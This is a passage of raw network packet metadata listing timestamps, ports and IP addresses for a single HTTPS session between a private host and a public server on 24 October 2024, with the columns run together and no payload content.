                                                                                              Oct 24, 2024 08:40:04.159668922 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.159677029 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.159684896 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.159718037 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.168329954 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.168489933 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.168520927 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.168533087 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.168540955 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.168574095 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.629153013 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.629204988 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.629234076 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.629252911 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.629292011 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.629518986 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.629805088 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.629852057 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.629863024 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.629870892 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.629925013 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.630276918 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.630330086 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.630372047 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.630379915 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.635039091 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.635107040 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.635114908 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.643877983 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.644010067 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.644038916 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.645459890 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.645513058 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.645522118 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.655478001 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.655674934 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.655683041 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.656012058 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.656044006 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.656075001 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.656110048 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.656110048 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.656119108 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.656686068 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.657485008 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.657493114 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.657908916 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.698276043 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.705749989 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.705796003 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.705796003 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.705812931 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.705895901 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.721812963 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.721859932 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.721956968 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.721966028 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722147942 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722176075 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722203016 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722238064 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.722238064 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.722246885 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722572088 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722599983 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722625971 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.722661972 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.722661972 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.722670078 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.723951101 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.724133015 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.726504087 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.732826948 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.732881069 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.732891083 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.736435890 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.736464024 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.736520052 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.736529112 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.736574888 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.748034954 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.748162031 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.748265028 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.748265982 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.748277903 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.748326063 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.748642921 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.749514103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.749553919 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.749572039 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.749582052 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.749650002 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.753880978 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754066944 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754101038 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754143953 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754154921 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.754162073 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.754271984 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.762907982 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.762937069 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.762953997 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.762962103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.763089895 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.763098955 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774383068 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774466991 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.774476051 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774583101 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774622917 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774622917 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.774633884 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.774799109 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.775093079 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.816430092 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.816454887 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.816483974 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.816495895 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.816620111 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.824755907 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.840496063 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.840517998 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.840543032 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.840553999 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.840658903 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.840747118 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841085911 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841116905 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841125011 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.841134071 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841176033 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.841181993 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841382980 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.841586113 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.841593027 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842067003 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842093945 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842123032 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842128038 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.842134953 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.842190027 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.845179081 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.851843119 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.851881981 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.851887941 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.851896048 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.851938009 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.855220079 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.858678102 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.858689070 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.858709097 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.866811991 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.866884947 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.866895914 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867008924 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867202044 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.867211103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867539883 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867583990 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867602110 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.867619991 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.867671967 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.867677927 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.873166084 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.873274088 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.873282909 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.873377085 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.873495102 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.873502970 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.876033068 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.876194000 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.881587029 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.881639004 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.881705046 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.881726027 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.881736040 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:04.881792068 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:04.881880045 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.224185944 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.224276066 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.224287987 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.229857922 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.229938984 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.229945898 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.229995966 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.230038881 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.230046034 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.230230093 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.230309963 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.238265991 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.238337040 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.238378048 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.238405943 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.238413095 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.238421917 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.238455057 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.238491058 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.238491058 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.238493919 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.238507032 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.238650084 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.239317894 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.250073910 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.250132084 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.250163078 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.250180960 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.250190973 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.250240088 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.250247002 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.250564098 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.250644922 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.250653028 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.322578907 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.322604895 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.322649002 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.322649002 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.322664022 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.322954893 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.323777914 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.323802948 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.323820114 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.323831081 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.323853970 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.323853970 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.342798948 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.342823982 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.342871904 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.342885017 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.342895985 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.343961000 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.357309103 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.357331038 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.357436895 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.357436895 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.357436895 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.357449055 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.410845041 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.410876036 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.410958052 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.410958052 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.410973072 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.411209106 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.442008972 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.442032099 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.442128897 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.442128897 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.442143917 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.442791939 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.442815065 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.442894936 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.442894936 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.442903996 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.444001913 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.461688995 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.461709976 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.461781025 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.461793900 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.461893082 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.475167990 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.476077080 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.476099014 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.476146936 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.476155043 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.476201057 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.488018990 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.488043070 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.488095999 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.488106012 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.488151073 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.516272068 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.560611963 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.560637951 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.560710907 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.560710907 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.560724974 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.560951948 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.561638117 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.561665058 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.561691046 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.561701059 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.561712027 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.578099012 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.580349922 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.580374002 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.580410004 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.580410004 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.580421925 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.580432892 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.586704969 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.586730957 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.586992025 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.587003946 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.587340117 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.600907087 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.606719017 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.606741905 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.607376099 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.607376099 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.607386112 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.651407003 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.679107904 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.679120064 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.679142952 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.679188967 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.679188967 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.679205894 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.679255962 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.680022001 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.680047989 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.680078030 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.680085897 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.680099010 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.680099010 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.680258989 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.687155962 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.687180996 CEST44349172142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:05.687238932 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.687238932 CEST49172443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:05.687247992 CEST44349172142.250.186.97192.168.2.22
